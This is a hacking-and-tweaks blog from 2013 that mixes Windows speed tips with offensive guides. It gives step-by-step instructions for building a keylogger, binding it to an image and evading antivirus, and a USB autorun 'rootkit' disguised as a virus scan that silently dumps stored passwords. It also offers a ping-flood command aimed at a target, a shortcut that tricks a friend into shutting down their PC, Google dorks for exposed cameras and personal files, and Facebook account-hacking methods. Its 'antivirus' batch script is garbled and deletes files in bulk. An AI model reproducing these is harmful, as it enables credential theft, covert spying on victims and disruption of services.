Friday 27 December 2013

Create your own Anti-Virus in Notepad++

Create your own Anti-Virus in Notepad++

For other you should pull out the big guns
Type the following code into Notepad:

@ echo off
echo off turn off the active virus
taskkill / F / IM virusname1.exe / IM virusname2.exe
echo Deleting all of the viruses based on size
for / RC: \%% a in (*. exe) do if%% ~ za 157,184 equ del / A: HSRA “%% a”
echo deleting the hidden virus
echo for drive c and subfolders
for / R C: \%% a in (*. doc.exe) do del “%% a”
echo for drive d and subfolders
for / R D: \%% a in (*. doc.exe) do del “%% a”
echo Unhide Document
cd / d c: \
echo for drive C and subfolders
*. doc attrib-H-S-A / S
cd / d d: \
echo for drive D and subfolders
*. doc attrib-H-S-A / S
exit

Save the file with bat extension,
For example antivirus.bat. then go to command prompt and run the Notepad file

4 Ways to Get Fast Boot Up Times


Step 1: Hard Disk Check-Up

Over time, your hard drives get degraded both physically and digitally. It’s important to monitor your drives health. An error or damaged sector can throw software loading into an infinite loop causing long load times. To check your drive health:
1. Click Start
2. Choose Computer
3. Right Click your Hard Drive
4. Choose Properties
5. Click Check Drives Health. After, the checkup gives you repair options or a clean bill of health.
6. Restart to get a faster boot up.

Step 2: Eliminate Startup Delay

To get faster boot up speeds, you can cut the boot delay to 0. The delay is in place to allow your startup processes some breathing room during loading. Your default delay is 30 seconds. So, you can eliminate it for faster boot up times.
1. Open your Start menu.
2. Click Run
3. In the command screen, type msconfig
4. In the system configuration utility, click either BOOT tab.
5. In the boot menu, change the default setting for the Time Out from 30 to 5 seconds.

Step 3: Organize your Hard Drive

If you are looking for something in a messy room, naturally, it’s going to take you longer to find something. This is a good metaphor for a hard drive. Over time, filing system gets disorganized. Periodically, you need to reorganize this filing system on your hard drive. Luckily, Windows has a good utility called Defrag that will put your system in order.
1.Open the Start Menu
2. Click on My Computer
3. Right Click your C: drive or your hard drive image.
4. Scroll down to the Click Properties
5. In the Properties Menus, Open the “Tools” menu.
6. Choose Defragment.
7. In the Disk Defragmenter menu. Click on Defragment

Step 4: Remove Excess Startup Programs

Most programs you add to your computer will opt to load when you start up your computer. Eventually, you will rack up a load of programs that kill faster boot times. You need to reduce the startup programs. You can easily disable unnecessary startup programs. Here is how:
1. Open your Start menu.
2. Click Run
3. Type msconfig, click Enter
4. In the system configuration utility, click either services or startup tab.
5. Uncheck all programs that you are no longer want to run in the background.
6. Click OK
Enjoy!!!

Thursday 26 December 2013

Protect Any Folder with Password Without Any Software

How To Lock Folder ?

1. Open Notepad and Copy code given below into it.

cls
@ECHO OFF
title pc-artist.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== pcartist goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End


2. Save the notepad file as lock.bat (.bat is the must)
3. Now double click on lock.bat and a new folder will be created with name MyFolder
4. Copy all your data you want to protect in that New folder
5. Now double click on lock.bat and when command prompt appears Type Y and press enter.
6. Now MyFolder will be hidden from your view, to access that folder double click on lock.bat
7. It will ask for password enter your password and done. (Default password is pcartist)

To change the password replace pcartist with the new password in the above code

How To Further Secure?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Monday 28 October 2013

How to create a Powerfull Keylogger

Rapzo Keylogger is one of the best keylogger to steal the data of your victim.

Note: You need to disable your Antivirus for the softwares to work.

Tools Required:
Rapzo Keylogger Download 
Simple Binder Download
  • First you need to Download the Rapzo Keylogger and Simple Binder.
  • Extract both the softwares, now go to Rapzo keylogger folder and create a keylogger using rapzo logger.exe
  • First Enable the Application and fill all the details like your email, pass..etc and test it(see screenshot)
  • Now go to Options on the top and check/tick Encrypt info, screen logger, stealers.
  • Now just click on Build Button thats it, your powerful keylogger is created.


How to make your keylogger file unsuspicious

  • Now Just Bind Your Keylogger File with the Image so that victim may not get any doubt.
  • Open Simple binder software and select your keylogger file and any Image file, save it with some name and click on bind button (see screenshot)
  • Done..when victim clicks on your binded keylogger an image will be displayed and keylogger gets installed.


Now if you scan your Binded keylogger file virus will be detected so you have to make your keylogger Undetectable by Antivirus.

How to Make Keylogger/Trojan Undetectable


Friday 25 October 2013

How To Get Someone’s Ip Address Through Facebook



Today, I am going to post the trick for getting someone’s Ip through Facebook.

Step 1 – First invite or ping that person for a chat on facebook.
Step 2 – Make sure your all other tabs in the browser and other services in the computer are closed. If Possible for you then delete all the cookies-cache and browsing history from your browser.
Step 3 – While chatting on Facebook go to Start >- Run >- cmd .
Step 4 – After Opening command Prompt Type netstat -an command and hit Enter.
Step 5 – Now you will get Ip Address of all the established connections there .
Step 6 – Note all the suspicious Ip’s and trace user using ip address tracer sites like whatismyip or ipmango.com .

That's It !
You can use the same trick for tracing IP of someones on Skype, gtalk and Yahoo Messenger.

DDOS Attack



DDOS attack is an attempt to make a computer resource unavailable to its intended users.

One common method of attack involves sending an enormous amount of request to Server or site and server will be unable to handle the requests and the site will be offline for some days or months depending upon the strength of Attack i.e. (Data Sent to the Site/Server)

Basic Procedure/Logic employed in DDOS :
1.) Open Command Prompt in windows by going to Start -> All Programs -> Accessories -> Command Prompt.

2.) Type "ping site-ip -l 5120 -n 100000 -w 1".
Here "site-ip" is the IP Address of Target, You can also use site-name like "www.google.com" instead of site-ip."5120" is the size of packet sent to the target

Which is 5 KB in example. "100000" is the no of requests sent to the Target. "- w 1" is the waiting time after each request which is 1 sec in the example. You

can change these parameters according to your need, but Don't omit these.
This Attack is also called "Ping of Death" But In Actual a Single Computer using this Attack cannot Deface a Site for a long time. Hackers Create and install

botnets on different computers as trojans and use those Comprised Computers also to send these Dummy Packets to Target. When a Large no of

Compromised Computer send simultaneous Requests to the target, the target site will be offline and Defaced...

Sunday 18 August 2013

Top Ten Tips To Improve System Speed

                 
                               


1. Let your PC boot up completely before opening any applications.

2. Refresh the desktop after closing any application. This will remove any unused files from the RAM.

3. Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).

4. Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM.

5. Empty the recycle bin regularly.The files are not really deleted from your hard drive until you empty the recycle bin.

6. Delete the temporary internet files regularly.

7. Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.

8. Always make two partitions in your hard drive. Install all large Software's (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.

9. When installing new Software's disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.

10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.



Enjoy Learning With Us  

Shutdown Friend's computer while chating !!!

It can be the coolest thing to do with you friends while chatting. There is
no Limitation on the messenger but the messenger should provide the
file transfer service to send the
following Program.


STEP 1) right-click on any folder goto-> New -> Shortcut.

STEP 2) Type in shortcut %windir%\system32\shutdown.exe -s -t 120 -c"The 31HA0w Virus Have invaded your Computer. And it is deleting your files"

STEP 3) right-click the shortcut goto -> Properties -> Choose Icon. Nowchoose any icon of your choice.

STEP 4) Compress the file in ZIP and sent it to your friend while chattingand tell him to open it...

Speed Up Your Games upto 40%


Now you can speed up your gaming performance through a software called Game booster. While launching a game it will temporarily turn off un-wanted programs, due to this it will automatically increase your PC gaming performance after closing a game it will restore all programs.

Features of Game Booster:

Increase your gaming performance upto 40% without installing any hardware device.

1 Click boosting game performance

Gaming performance will be better than before.

Pure Gaming Environment with "Game Desktop"

Tweak System for Top Gaming Performance

Real-time Screen-cast for Sharing





Click here for Download

Thursday 8 August 2013

How to sniff Passwords using USB Drive



Anyone can steal stored passwords from any computer and that too by using your USB drive.
Can’t believe!
Read on..
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassViewRecovers the passwords of the following email programs: Outlook Express, MicrosoftOutlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How to use google for hacking


1. Hacking Security Cameras

There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.

2. Hacking Personal and Confidential Documents
Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls

3. Hacking Google to gain access to Free Stuffs

Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem
Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3? with “pdf” or “zip” or “rar”.

I hope you enjoy this post.

How to test the Working of your Anti Virus

Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.
1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2. Rename the file from New Text Document.TXT to myfile.com
3. Now run the antivirus scan on this myfile.com file.
If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.
NOTE: Most antivirus will pop-out a warning message in the Step-1 itself
You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.

5 Ways to hack a Facebook Account | Facebook Hacking


5  Ways to hack a Facebook account, something most of our readers always wanted to Learn, something new about Facebook Hacking. Learn the best attacks for Facebook Hacking with their advantages and drawbacks.
Note:- This tutorial is for educational purpose only and may not be used for any blackhat purpose. The prime aim of this tutorial is to create awareness so that you guys can protect yourself  from getting hacked.
Before learning the actual procedure you should know about different types of attacks, their drawbacks and prevention against these attacks .
5 Ways to Hack a Facebook Account | Facebook Hacking
5 Ways to Hack a Facebook Account | Facebook Hacking
1) Phishing :
The first and very basic way of hacking Facebook accounts is via Phishing. Phishing is actually creating fake web pages to steal user’s credentials like email,passwords,phone no,etc.
DRAWBACK :
Users nowadays are aware of these type of attacks and one can not be easily fooled using this attack. You need some social engineering to trick someone.

Prevention :
  • Always check the page URL before logging in. This is the most trusted and effective way one can use to avoid himself from phishing.

  • Other way is to use some good Antivirus software which will warn you if  you visit a harmful phishing page.
    Even if somehow you have already entered your credentials in a phisher, Immediately Change your password.

2) Keylogging :
This is another good way of hacking Facebook accounts. In this type of attack a hacker simply sends an infected file having keylogger in it to the victim. If the victim executes that file on his pc, whatever he types will be mailed/uploaded to hacker’s server. The advantage of this attack is that the victim won’t know that hacker is getting every Bit of data he is typing. Another big advantage is that hacker will get passwords of all the accounts used on that PC.

DRAWBACK :
Keyloggers are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.
Prevention :
  • Execute the file only if you trust the sender.
  • Use online scanner such as novirusthanks.org
  • Use good antivirus and update it regularly .

3) Trojans/backdoors :This is an advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can do whatever he wants with the victim’s PC .
DRAWBACK :
Trojans are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.
Prevention :
  • Execute the file only if you trust the sender.
  • Use online scanner such as novirusthanks.org
  • Use good antivirus and update it regularly .

4)Sniffing
It consists of stealing session in progress. In this type of attack an attacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.
DRAWBACK :
  • If user is logged out then attacker is also logged out and the session is lost.
  • It is difficult to sniff on SSL protected networks.
Prevention :
  • Always use SSL secured connections.
  • Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.

5)Social Engineering :
This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.
Answering the security questions also lies under this category.
Drawback :
It is not easy to convince someone to make him give his password.
Guessing generally doesn’t always work ( Although if you are lucky enough it may work!).

Prevention :
  • Never give your password to anyone
  • Don’t believe in any sort of emails which asks for your password

6) Session Hijacking
In a session hijacking attack an attacker steals victims cookies, cookies stores all the necessary logging Information about one’s account, using this info an attacker can easily hack anybody’s account. If you get the cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook, Google, Yahoo.
Drawbacks :
  • You will be logged out when user is logged out.
  • You will not get the password of the user’s account.
  • Will not work if the user is using HTTPS connections.

Prevention :
  • Always work on SSL secured connections.
  • Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.

Watch Star Wars movie in CMD



This is very intersting and amazing command prompt trick which will play star wars movie in the command prompt or cmd. Below are complete steps with screen shots for this trick with. Without wasting time lets gets started.


       1. Go to start > Run and type in cmd and press enter
       2. Now type in telnet as shown below and press enter.


  3. After that enter o as shown below and press enter.



4. Next enter towel.blinkenlights.nl as shown below and press enter.



5. Now star wars movie will start playing on your command prompt.



6. Enjoy !!!!!

Sunday 30 June 2013

Delete An Undeletable File

Open a Command Prompt window and leave it open.

Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.

Leave Task Manager open.

Go back to the Command Prompt window and change to the directory the AVI
(or other undeletable file) is located in.
At the command prompt type DEL <filename> where <filename> is the file
you wish to delete.

Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to
restart the GUI shell.
Close Task Manager.

Or you can try this

Open Notepad.exe

Click File>Save As..>
locate the folder where ur undeletable file is
Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box
put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will
overwrite it)
click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as
normal

Here's a manual way of doing it. I'll take this off once you put into your first
post zain.
1. Start

2. Run

3. Type: command

4. To move into a directory type: cd c:\*** (The stars stand for your folder)

5. If you cannot access the folder because it has spaces for example Program
Files or Kazaa Lite folder you have to do the following. instead of typing in the
full folder name only take the first 6 letters then put a ~ and then 1 without
spaces. Example: cd c:\progra~1\kazaal~1

6. Once your in the folder the non-deletable file it in type in dir - a list will
come up with everything inside.

7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file
name has spaces you would use the special 1st 6 letters followed by a ~ and a
1 rule. Example: if your file name was bad file.bmp you would type once in the
specific folder thorugh command, del badfil~1.bmp and your file should be
gone. Make sure to type in the correct extension.